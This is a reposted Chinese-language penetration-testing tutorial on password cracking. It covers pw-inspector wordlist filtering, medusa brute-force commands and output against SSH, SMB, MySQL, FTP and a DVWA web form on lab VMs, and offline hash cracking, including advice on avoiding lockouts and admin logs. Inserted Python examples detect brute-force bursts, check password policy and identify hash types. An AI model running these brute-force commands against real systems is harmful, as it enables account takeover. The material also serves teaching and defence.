Online password cracking: hydra; online password cracking: medusa; offline password cracking

Online password cracking: hydra

pw-inspector

- Filter a wordlist by length and character set

- pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l

- pw-inspector -i /usr/share/wordlists/nmap.lst -o P.lst -u

Password cracking efficiency

- Password complexity (wordlist hit rate)

- Bandwidth, protocol, server performance, client performance

- Lockout threshold

- Maximum number of login requests per unit of time
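The lockout threshold and the cap on login requests per unit of time are the controls a defender tunes against online guessing. As an added example (not from the original post), this Python snippet applies the same sliding-window rule to constructed sshd log lines: it reports every source whose failures reach the threshold inside the window, and records any login accepted right after such a burst. Host name, addresses and the year are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd auth.log lines (not captured traffic); host and addresses are made up.
SAMPLE_LOG = """\
Apr 21 23:00:01 srv sshd[2201]: Failed password for root from 192.168.1.50 port 40001 ssh2
Apr 21 23:00:02 srv sshd[2202]: Failed password for root from 192.168.1.50 port 40002 ssh2
Apr 21 23:00:03 srv sshd[2203]: Failed password for invalid user admin from 192.168.1.50 port 40003 ssh2
Apr 21 23:00:04 srv sshd[2204]: Failed password for root from 192.168.1.50 port 40004 ssh2
Apr 21 23:00:05 srv sshd[2205]: Failed password for root from 192.168.1.50 port 40005 ssh2
Apr 21 23:00:06 srv sshd[2206]: Accepted password for root from 192.168.1.50 port 40006 ssh2
Apr 21 23:05:00 srv sshd[2210]: Failed password for msfadmin from 192.168.1.77 port 50001 ssh2
"""
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)"
)

def parse_line(line, year=2016):
    """Parse one sshd line into (timestamp, result, user, source), or None if it is not a login event."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]

def detect_bursts(log_text, threshold=5, window_seconds=60):
    """Flag sources whose failures inside any sliding window reach `threshold`
    (the rate a lockout or rate-limit policy would stop). A later accepted login
    from a flagged source is recorded too: success after a burst is the strongest sign."""
    recent = defaultdict(deque)  # source -> timestamps of failures still inside the window
    alerts = {}
    for line in log_text.splitlines():
        event = parse_line(line)
        if event is None:
            continue
        ts, result, user, src = event
        if result == "Accepted":
            if src in alerts:
                alerts[src]["accepted_after_burst"] = user
            continue
        window = recent[src]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold and src not in alerts:
            alerts[src] = {"first_breach": ts, "failures": len(window), "accepted_after_burst": None}
    return alerts
```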

root@K:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l

root@K:~# cat /usr/share/wordlists/nmap.lst

root@K:~# more p.lst

root@K:~# pw-inspector

PW-Inspector v0.2 (c) 2005 by van Hauser / THC [email protected] [http://www.thc.org]

Syntax: pw-inspector [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p -s

Options:

-i FILE file to read passwords from (default: stdin)

-o FILE file to write valid passwords to (default: stdout)

-m MINLEN minimum length of a valid password

-M MAXLEN maximum length of a valid password

-c MINSETS the minimum number of sets required (default: all given)

Sets:

-l lowcase characters (a,b,c,d, etc.)

-u upcase characters (A,B,C,D, etc.)

-n numbers (1,2,3,4, etc.)

-p printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)

-s special characters - all others not withint the sets above

PW-Inspector reads passwords in and prints those which meet the requirements.

The return code is the number of valid passwords found, 0 if none was found.

Use for security: check passwords, if 0 is returned, reject password choice.

Use for hacking: trim your dictionary file to the pw requirements of the target.

Usage only allowed for legal purposes.

root@K:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l -m 3 -M 5

root@K:~# more p.lst
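The help text above defines pw-inspector's behaviour: character classes (-l/-u/-n/-p/-s), a length range (-m/-M), a minimum number of classes (-c), and an exit code equal to the number of passwords kept, which is what makes it usable as a password-policy check. As an added example (not pw-inspector's own code), this Python version reproduces that logic on a constructed wordlist and exposes the "use for security" mode as a policy function. The "s" class is approximated as the fallback for every character the first four classes do not cover.

```python
import string

# Character classes modelled on pw-inspector's -l/-u/-n/-p/-s sets; "s" is the
# fallback for anything the first four do not cover, as the help text describes.
CLASSES = {
    "l": lambda ch: ch in string.ascii_lowercase,
    "u": lambda ch: ch in string.ascii_uppercase,
    "n": lambda ch: ch in string.digits,
    "p": lambda ch: ch in string.punctuation,
    "s": lambda ch: True,
}

def char_classes(password):
    """Return the set of class letters present in password, e.g. {"l", "u", "n"}."""
    found = set()
    for ch in password:
        for name, member in CLASSES.items():
            if member(ch):
                found.add(name)
                break
    return found

def inspect(words, required="l", min_len=0, max_len=None, min_sets=None):
    """Filter like `pw-inspector -m MIN -M MAX -c MINSETS` with the class flags
    given in `required`: keep words of acceptable length that contain at least
    min_sets of the required classes (default: all of them). Returns the kept
    words; len() of the result is what pw-inspector reports as its exit code."""
    need = len(required) if min_sets is None else min_sets
    kept = []
    for word in words:
        if len(word) < min_len or (max_len is not None and len(word) > max_len):
            continue
        if len(char_classes(word) & set(required)) >= need:
            kept.append(word)
    return kept

def policy_accepts(candidate, required="lunp", min_len=8, min_sets=3):
    """The 'use for security' mode from the help text: a password choice is
    rejected when the filter keeps nothing, i.e. the count would be 0."""
    return len(inspect([candidate], required, min_len, None, min_sets)) > 0

# Constructed stand-in for a wordlist file such as nmap.lst.
SAMPLE_WORDS = ["123456", "abc", "Passw0rd!", "hello", "HELLO", "abcdefgh", "p@ss", "Secret2016"]
```

`inspect(SAMPLE_WORDS, "l", 3, 5)` corresponds to the `-l -m 3 -M 5` run shown above.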

Online password cracking: medusa

Drawbacks of hydra

- Poor stability; the program crashes often

- Poor rate control; it easily triggers service blocking or lockout mechanisms

- A new process per host and a new instance per service

- Poor performance when cracking a large number of targets

Characteristics of medusa

- Good stability

- Well-controlled rate

- Thread-based

- Fewer supported modules than hydra (no RDP support)

- Web-form support has defects

root@k:~# medusa -h

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks [email protected]

medusa: option requires an argument -- 'h'

CRITICAL: Unknown error processing command-line options.

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

-h [TEXT] : Target hostname or IP address

-H [FILE] : File containing target hostnames or IP addresses

-u [TEXT] : Username to test

-U [FILE] : File containing usernames to test

-p [TEXT] : Password to test

-P [FILE] : File containing passwords to test

-C [FILE] : File containing combo entries. See README for more information.

-O [FILE] : File to append log information to

-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)

-M [TEXT] : Name of the module to execute (without the .mod extension)

-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a
             different parameter each time and they will all be sent to the module (i.e.
             -m Param1 -m Param2, etc.)

-d : Dump all known modules

-n [NUM] : Use for non-default TCP port number

-s : Enable SSL

-g [NUM] : Give up after trying to connect for NUM seconds (default 3)

-r [NUM] : Sleep NUM seconds between retry attempts (default 3)

-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.

-c [NUM] : Time to wait in usec to verify socket is available (default 500 usec).

-t [NUM] : Total number of logins to be tested concurrently

-T [NUM] : Total number of hosts to be tested concurrently

-L : Parallelize logins using one username per thread. The default is to process
             the entire username before proceeding.

-f : Stop scanning host after first valid username/password found.

-F : Stop audit after first valid username/password found on any host.

-b : Suppress startup banner

-q : Display module's usage information

-v [NUM] : Verbose level [0 - 6 (more)]

-w [NUM] : Error debug level [0 - 10 (more)]

-V : Display version

-Z [TEXT] : Resume scan based on map of previous scan

root@k:~# medusa -d

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks [email protected]

Available modules in "." :

Available modules in "/usr/lib/medusa/modules" :

+ cvs.mod : Brute force module for CVS sessions : version 2.0

+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1

+ http.mod : Brute force module for HTTP : version 2.1

+ imap.mod : Brute force module for IMAP sessions : version 2.0

+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0

+ mysql.mod : Brute force module for MySQL sessions : version 2.0

+ nntp.mod : Brute force module for NNTP sessions : version 2.0

+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0

+ pop3.mod : Brute force module for POP3 sessions : version 2.0

+ postgres.mod : Brute force module for PostgreSQL sessions : version 2.0

+ rexec.mod : Brute force module for REXEC sessions : version 2.0

+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0

+ rsh.mod : Brute force module for RSH sessions : version 2.0

+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1

+ smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1

+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0

+ snmp.mod : Brute force module for SNMP Community Strings : version 2.1

+ svn.mod : Brute force module for Subversion sessions : version 2.1

+ telnet.mod : Brute force module for telnet sessions : version 2.0

+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0

+ vnc.mod : Brute force module for VNC sessions : version 2.1

+ web-form.mod : Brute force module for web forms : version 2.1

+ wrapper.mod : Generic Wrapper Module : version 2.0

Online password cracking: medusa

medusa -d

Cracking Windows passwords

- medusa -M smbnt -h 1.1.1.1 -u administrator -P pass.lst -e ns -F

Cracking Linux SSH passwords

- medusa -M ssh -h 192.168.20.10 -u root -P pass.lst -e ns -F     

Cracking passwords of other services

- medusa -M mysql -h 1.1.1.1 -u root -P pass.lst -e ns -F         

- medusa -h 1.1.1.1 -u admin -P pass.lst -M web-form -m FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-DATA:"post?user=username&pas=password&Login=Login"

msfadmin@metasploitable:~$ sudo passwd root

[sudo] password for msfadmin:

Enter new UNIX password:

Retype new UNIX password:

No password supplied

Enter new UNIX password:

Retype new UNIX password:

passwd: password updated successfully

root@K:~# medusa -M ssh -h 192.168.1.113 -e ns -F -u root -P /usr/share/wordlists/nmap.lst

root@K:~# grep 1234 /usr/share/wordlists/nmap.lst

root@K:~# grep ^1234% /usr/share/wordlists/nmap.lst

root@K:~# cat /usr/share/wordlists/nmap.lst | grep -v #

root@K:~# cat /usr/share/wordlists/nmap.lst | grep -v # > pass.lst

root@K:~# medusa -M ssh -h 192.168.1.113 -e ns -f -u root -P pass.lst

The XP machine's IP address is 192.168.1.118

C:\> net user administrator zipper

root@K:~# medusa -M smbnt -h 192.168.1.118 -u administrator -P pass.lst -e ns -f

root@K:~# nmap -p3306 192.168.1.113

Starting Nmap 7.12 ( https://nmap.org ) at 2016-04-21 23:00 CST

Nmap scan report for 192.168.1.113

Host is up (10.00036s latency).

PORT STATE SERVICE

3306/tcp open mysql

MAC Address: 08:00:27:B0:3A:76 (Oracle Virtualbox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds

root@K:~# medusa -M mysql -h 192.168.1.113 -e ns -F -u root -P pass.lst

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks [email protected]

ACCOUNT CHECK: [mysql] Host: 192.168.1.113 (1 of 1, 0 complete) User: root (1 of 5000 complete) Password: (1 of 5000 complete)

ACCOUNT CHECK: [mysql] Host: 192.168.1.113 User: root Password: [SUCCESS]

root@K:~# medusa -M ftp -h 192.168.1.113 -e ns -F -u ftp -P pass.lst

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks [email protected]


root@K:~# medusa -M ftp -h 192.168.1.113 -e ns -F -u ftp -P pass.lst -n 2121

root@K:~# medusa -h 192.168.1.113 -u admin -P pass.lst -M web-form -m FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-DATA:"post?user=username&pas=password&Login=Login"

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks [email protected]

ERROR: The answer was NOT successfully received, understood, and accepted while trying admin 123456: error code 302

ACCOUNT CHECK: [web-form] Host: 192.168.1.113 (1 of, 0 complete) User: admin (1 of 1, 0 complete) Password: 123456 (1 of 4998 complete)

root@K:~# medusa -M web-form -q

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks [email protected]

web-form.mod (2.1) Luciano Bello [email protected] :: Brute force module for web forms

Available module options:

USER-AGENT:? User-agent value. Default: "I'm not Mozilla, I'm Ming Mong".

FORM:? Target form to request. Default: "/"

DENY-SIGNAL:? Authentication failure message. Attempt flagged as successful if text is not present in
                 server response. Default: "Login incorrect"

CUSTOM-HEADER:? Custom HTTP header.
                 More headers can be defined by using this option several times.

FORM-DATA:?
                 Methods and fields to send to web service. Valid methods are GET and POST. The actual form
                 data to be submitted should also be defined here. Specifically, the fields: username and
                 password. The username field must be the first, followed by the password field.
                 Default: "post?username=&password="

Usage example: "-M web-form -m USER-AGENT:"g3rg3 gerg" -m FORM:"webmail/index.php" -m DENY-SIGNAL:"deny!"
             -m FORM-DATA:"post?user=&pass=&submit=True" -m CUSTOM-HEADER:"Cookie: name=value"

Online password cracking: medusa

- -n : non-default port

- -s : use an SSL connection

- -T : number of hosts tested concurrently

medusa -M ftp -q

root@k:~# medusa -M ftp -q

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks [email protected]

ftp.mod (2.1) pMonkey [email protected] :: Brute force module for FTP/FTPS sessions

Available module options:

MODE:? (NORMAL*, EXPLICIT, IMPLICIT)

EXPLICIT: AUTH TLS Mode as defined in RFC 4217
 Explicit FTPS (FTP/SSL) connects to a FTP service in the clear. Prior to
 sending any credentials, however, an "AUTH TLS" command is issued and a
 SSL session is negotiated.

IMPLICIT: FTP over SSL (990/tcp)
 Implicit FTPS requires a SSL handshake to be performed before any FTP
 commands are sent. This service typically resides on tcp/990. If the user
 specifies this option or uses the "-n" (SSL) option, the module will
 default to this mode and tcp/990.

NORMAL
 The default behaviour if no MODE is specified. Authentication is attempted
 in the clear. If the server requests encryption for the given user,
 Explicit FTPS is utilized.

Example Usage:
medusa -M ftp -h host -u username -p password
medusa -M ftp -s -h host -u username -p password
medusa -M ftp -m MODE:EXPLICIT -h host -u username -p password

(*) Default value

Offline password cracking

Authentication

- Never transmit passwords in plaintext

- Each authentication transmits the password protected by a HASH algorithm (a HASH is easy to compute and hard to invert)

- The server-side user database should store passwords salted and hashed

Cracking approach

- Sniff the network to capture password HASHes

- Exploit a vulnerability to log in to the server and obtain password HASHes from the user database

- Identify the HASH type

  length, character set

- Use an offline cracking tool to collide (recover) the password HASH

Offline password cracking

Advantages

- Working offline does not trigger password lockout mechanisms

- Does not generate large numbers of failed-login log entries that would draw the administrator's attention

HASH identification tools

- hash-identifier

- Hashid

- May misidentify a hash or fail to identify it

Firefox add-on hashr
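Identifying a hash by length and character set, as the tools listed above do, is guesswork: a raw hex digest carries no algorithm marker, so several algorithms share every common length. As an added example (not the page's code and not hash-identifier's, hashid's or hashr's), this Python classifier recognises modular-crypt prefixes, the MySQL 4.1+ marker and raw hex digest lengths, returns every plausible candidate rather than one answer, and pulls the hash field out of a shadow-style dump line. The dump entries are constructed placeholders (the MD5 value is the textbook digest of the word "password").

```python
import re
# crypt(3) modular-crypt-format prefixes, which name the algorithm unambiguously
MCF_PREFIXES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}
# Raw hex digests carry no algorithm marker: a length maps to several candidates.
HEX_CANDIDATES = {
    32: ["MD5", "MD4", "NTLM", "LM"],
    40: ["SHA-1", "RIPEMD-160"],
    56: ["SHA-224"],
    64: ["SHA-256", "SHA3-256"],
    96: ["SHA-384"],
    128: ["SHA-512", "SHA3-512"],
}

def identify(token):
    """Return (candidates, reason) for one hash string, judged by prefix, length and
    charset only. More than one candidate means the type must be confirmed another
    way (a known plaintext, the source system): this is why identifiers can be wrong."""
    token = token.strip()
    for prefix, name in MCF_PREFIXES.items():
        if token.startswith(prefix):
            return [name], "modular crypt prefix " + prefix
    if re.fullmatch(r"\*[0-9A-F]{40}", token):
        return ["MySQL 4.1+ (SHA1(SHA1(pw)))"], "leading * and 40 upper-case hex"
    if re.fullmatch(r"[0-9a-fA-F]+", token):
        cands = HEX_CANDIDATES.get(len(token), [])
        return list(cands), f"{len(token)} hex chars"
    if len(token) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", token):
        return ["base64-encoded digest: decode, then re-identify"], "base64 charset"
    return [], "unknown charset"

def hash_field(record):
    """Extract the hash from a colon-separated dump line such as an /etc/shadow
    entry (user:hash:lastchg:...) or a plain user:hash pair."""
    fields = record.rstrip("\n").split(":")
    return fields[1] if len(fields) > 1 else fields[0]

# Constructed sample dump: salts and hashes are placeholders, not real accounts.
SAMPLE_DUMP = [
    "root:$6$Zt1QxS9a$placeholderhashplaceholderhash:17000:0:99999:7:::",
    "www:$2b$12$placeholderbcryptsaltandhash",
    "svc:5f4dcc3b5aa765d61d8327deb882cf99",
    "db:*0123456789ABCDEF0123456789ABCDEF01234567",
]
```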



Reposted from blog.csdn.net/anquanniu/article/details/82427517